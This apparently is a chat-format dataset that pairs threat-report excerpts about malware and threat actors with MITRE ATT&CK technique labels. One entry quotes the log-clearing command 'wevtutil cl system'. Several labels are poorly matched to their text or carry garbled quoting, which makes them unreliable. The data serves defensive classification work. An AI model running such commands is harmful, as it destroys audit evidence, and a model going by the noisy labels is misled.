- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "VBScript #1 The dropped script “58d2a83f7778d5.36783181.vbs” acts as a launcher"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The backdoor's infrequent beaconing, traffic obfuscation, extensive encryption and use of geographically local, legitimate websites for command and control (C2) make identification of its network traffic difficult"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "logs key strokes for configured processes and sends them back to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains the ftpUpload function to use the FTPManager:uploadFile method to upload files from the target system."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ajax Security Team has used Wrapper/Gholee, custom-developed malware, which downloaded additional malware to the infected system."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WhisperGate can overwrite the Master Book Record (MBR) on victim systems with a malicious 16-bit bootloader."
- },
- {
- "role": "assistant",
- "content": "T1561.002 - Disk Structure Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": ". . MuddyWater has conducted various campaigns against entities spread throughout the U.S.A, Europe, Middle East and South Asia.. . A typical TTP employed by the group is the heavy use of scripting in their infection chains using languages like PowerShell and Visual Basic coupled with the frequent use of living-of-the-land binaries (LoLBins).. . Cisco Talos recently observed a campaign operated by MuddyWater targeting users in Turkey. This campaign consists of the use of malicious PDFs and Microsoft Office documents (maldocs) to serve as the initial infection vector. These maldocs were named in such a way as to masquerade as legitimate documents from the Turkish Health and Interior Ministries.. . Next, the malware executes a series of scripts deployed on the infected endpoint to serve as downloaders and instrumentors for additional payloads.. . We've also discovered the use of flags or tokens in attacks conducted by this threat actor in this campaign. These tokens are meant to signal a successful infection of a target by the group's malicious artifacts.. . . . "
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Micropsia searches for anti-virus software and firewall products installed on the victim’s machine using WMI."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation', 'T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "will identify Microsoft Office documents on the victim's computer."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PlugX has the ability to use DLL search order hijacking for installation on targeted systems."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HDS Deletes the file created by the HD command to reverse the effect"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Linux Rabbit sends the payload from the C2 server as an encoded URL parameter."
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tweets by second account @dookhtegan1 providing a Telegram channel with the leaked files Data Dump Contents The contents of the data dump includes various types of datasets that appear to be results from reconnaissance activity, initial compromises, and tools the OilRig operators use against target organizations"
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping', 'T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Capabilities of the NETWIRE backdoor include key logging, reverse shell, and password theft. The backdoor uses a custom encryption algorithm to encrypt data and then writes it to a file created in the ./LOGS directory"
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging', 'T1560.003 - Archive via Custom Method"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SDBbot is a new remote access Trojan (RAT) written in C++ that has been delivered by the Get2 downloader in recent TA505 campaigns. Its name is derived from the debugging log file (sdb.log.txt) and DLL name (BotDLL[.]dll) used in the initial analyzed sample. It also makes use of application shimming [1] for persistence"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Avaddon deletes backups and shadow copies using native system tools."
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of reading files over the C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DustySky searches for removable media and duplicates itself onto it."
- },
- {
- "role": "assistant",
- "content": "T1091 - Replication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "yty gets an output of running processes using the \"tasklist\" command."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Containers that are created during the attack are configured to bind /tmpXXXXXX directory to the root directory of the hosting server. This means every file on the server’s filesystem can be accessed and even modified, with the correct user permissions, from within the container"
- },
- {
- "role": "assistant",
- "content": "T1611 - Escape to Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkComet can steal data from the clipboard."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A QuasarRAT .dll file is digitally signed by a certificate from AirVPN."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSX/Shlayer has used the \"mktemp\" utility to make random and unique filenames for payloads, such as \"export tmpDir=\"$(mktemp -d /tmp/XXXXXXXXXXXX)\"\" or \"mktemp -t Installer\"."
- },
- {
- "role": "assistant",
- "content": "T1564 - Hide Artifacts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After the malware has invoked a method named _s_is_high_time and waited on several timers to expire, it begins encrypting the (unfortunate) user’s files, by invoking a function named carve_target. It then generates a list of files to encrypt, by invoking the get_targets function, passing in the is_file_target as a filter function. This filter function filters out all files, except those that match certain file extensions. The encrypted list of extensions is hard-coded at address 000000010001299E within the malware. In part one of this blog post series, we decrypted all the embedded string, thus can readily examine the decrypted list"
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "hollows out a newly created process RegASM.exe and injects its payload into the hollowed process."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Packet::getData decrypts the received payload and Converter::outString descrambles the result"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to get the victim's domain and NetBIOS name."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbanak installs VNC server software that executes through rundll32."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The analyzed sample of NotPetya encrypts the compromised system’s files with a 128-bit Advanced Encryption Standard (AES) algorithm during runtime. The malware then writes a text file on the “C:\\” drive that includes a static Bitcoin wallet location as well as unique personal installation key intended for the victim to use when making the ransom payment and the user’s Bitcoin wallet ID. NotPetya modifies the master boot record (MBR) to enable encryption of the master file table (MFT) and the original MBR, and then reboots the system. Based on the encryption methods used, it appears unlikely that the files could be restored, even if the attacker received the victim’s unique key and Bitcoin wallet ID"
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carberp has exploited multiple Windows vulnerabilities (CVE-2010-2743, CVE-2010-3338, CVE-2010-4398, CVE-2008-1084) and a .NET Runtime Optimization vulnerability for privilege escalation."
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FruitFly has the ability to list processes on the system."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kinsing has used crontab to download and run shell scripts every minute to ensure persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.003 - Scheduled Task/Job: Cron"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot searches the system for all of the following file extensions: .avi, .mov, .mkv, .mpeg, .mpeg4, .mp4, .mp3, .wav, .ogg, .jpeg, .jpg, .png, .bmp, .gif, .tiff, .ico, .xlsx, and .zip. It can also obtain browsing history, cookies, and plug-in information."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MirageFox has a function for decrypting data containing C2 configuration information."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kessel can create a reverse shell between the infected host and a specified system."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "REvil reached its pinnacle of success in the first half of 2021, compromising thousands of companies in a Kaseya MSP supply-chain attack, demanding a $50 million payment from computer maker Acer, and extorting Apple using stolen blueprints of non-yet-released devices."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware', 'T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a tool that exfiltrates data over the C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hook module structure After decrypting the strings, it became clear that the Linux Hook main module communicated with the same CnC server as other Windows modules: The CNC’s IP address in the Linux module This Linux module can process the following commands, some of which are similar to the Windows version: die delete all BlackEnergy2 files and system traces kill delete all BlackEnergy2 files and system traces and reboot lexec launch a command using bin/sh rexec download and launch file using ‘fork/exec’ update rewrite self file migrate update the CnC server Windows Plugins After the disclosure of an unusual CnC server that pushed Linux and the new Windows plugins we paid greater attention to new BE2 samples and associated CnCs"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API', 'T1070.004 - Indicator Removal on Host: File Deletion', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly created accounts that appeared to be tailored to each individual staging target."
- },
- {
- "role": "assistant",
- "content": "T1136 - Create Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The following screenshot shows the command execution functionality in action: Figure 4: Command Execution The paramString parameter shown in the above screenshot can be any command received from C&C"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture', 'T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "looks for specific files and file types."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Daserf leverages Mimikatz and Windows Credential Editor to steal credentials."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clop can enumerate all processes on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OceanSalt can extract drive information from the endpoint and search files on the system."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KOCTOPUS will perform UAC bypass either through fodhelper.exe or eventvwr.exe."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "encapsulates traffic in multiple layers of encryption."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 1: Contents of the Email A review of the email header data from the spear phishing messages showed that the threat actors sent the emails using the same infrastructure they have used in the past"
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This module intercepts HWP documents on an infected computer. The HWP file format is similar to Microsoft Word documents, but supported by Hangul, a South Korean word processing application from the Hancom Office bundle. This malware module works independently of the others and maintains its own Bulgarian e-mail account. The account is hardcoded in the module along with the master’s e-mail to which it sends intercepted documents. It is interesting that the module does not search for all the HWP files on infected computer, but reacts only to those that are opened by the user and steals them. This behavior is very unusual for a document-stealing component and we do not see it in other malicious toolkits"
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MobileOrder has a command to upload information about all running processes to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ferocious can use \"GET.WORKSPACE\" in Microsoft Excel to determine the OS version of the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects hard drive content and system configuration information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses Base64 encoding for C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used CMSTP.exe and a malicious INF to execute its payload."
- },
- {
- "role": "assistant",
- "content": "T1218.003 - Signed Binary Proxy Execution: CMSTP"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Initially, cybercriminals used BlackEnergy custom plugins for launching DDoS attacks. BlackEnergy2 was eventually seen downloading more crimeware plugins – a custom spam plugin and a banking information stealer custom plugin. While another crimeware group continues to use BlackEnergy to launch DDoS attacks, the BE2 APT appears to have used this tool exclusively throughout 2014 at victim sites and included custom plugins and scripts of their own. To be clear, our name for this actor has been the BE2 APT, while it has been called “Sandworm Team” also"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rocke used scripts which killed processes and added firewall rules to block traffic related to other cryptominers."
- },
- {
- "role": "assistant",
- "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN10 has relied on publicly-available software to gain footholds and establish persistence in victim environments."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This DLL is used for decrypting and executing another JavaScript backdoor such as Orz. The DLL is registered by the installer using regsvr32. If the string “DR” is passed as an argument, or if the DLL is running in the active session with a username that is not “system”, the final JavaScript backdoor is decoded using a custom base64 alphabet. This backdoor has to be present in the same directory as the dll, with a “.tmp” file extension. The backdoor script is then executed using the IActiveScript and IActiveScriptParse32 COM interfaces"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Throughout 2017 and 2018 Unit 42 has been tracking and observing a series of highly targeted attacks focused in South East Asia, building on our research into the KHRAT Trojan. Based on the evidence, these attacks appear to be conducted by the same set of attackers using previously unknown malware families. In addition, these attacks appear to be highly targeted in their distribution of the malware used, as well as the targets chosen. We believe this group is previously unidentified and therefore have we have dubbed it “RANCOR”. The Rancor group’s attacks use two primary malware families which we describe in depth later in this blog and are naming DDKONG and PLAINTEE. DDKONG is used throughout the campaign and PLAINTEE appears to be new addition to these attackers’ toolkit. Countries Unit 42 has identified as targeted by Rancor with these malware families include, but are not limited to"
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HermeticWizard has the ability to use `wevtutil cl system` to clear event logs."
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "First observed by Microsoft on Jan. 13, 2022, WhisperGate malware is computer network attack (CNA) malware aimed at deleting Microsoft Windows Defender and corrupting files on the target. It consists of two samples: One appears as ransomware while the other is a beaconing implant used to deliver an in-memory Microsoft Intermediate Language (MSIL) payload. At the time of writing, there are two known samples identified as WhisperGate: Stage1.exe and Stage2.exe. Stage1.exe purports to be ransomware, as it overwrites the target’s master boot record with 512 bytes and upon reboot displays the following ransom note"
- },
- {
- "role": "assistant",
- "content": "T1561.002 - Disk Structure Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ComRAT can load a PE file from memory or the file system and execute it with \"CreateProcessW\"."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once Shellex is called, it first passes each of the items in the config buffer to their own strings. Next, it creates a mutex using the filename and checks to see if the Service key for the service name exists. If so, it opens it using service manager. If not, it first saves a copy of itself to %Program Files (x86)%/DIFXE/svchost.exe. Next, it creates the service and runs it"
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry', 'T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MoonWind can execute commands via an interactive command shell."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has used WMI to identify anti-virus products installed on a victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crutch can use Dropbox to receive commands and upload stolen data."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Usually, after infection the bot sends a ‘PING’ message, ‘SYSTEM INFO’ message and ‘ASK for COMMAND’ message, and the C2 replies with ‘ACK’ and ‘COMMAND’ messages. If additional modules were pushed by the C2, the bot sends a ‘STOLEN INFO’ message containing data stolen by the modules"
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Note that IP addresses can be reallocated"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
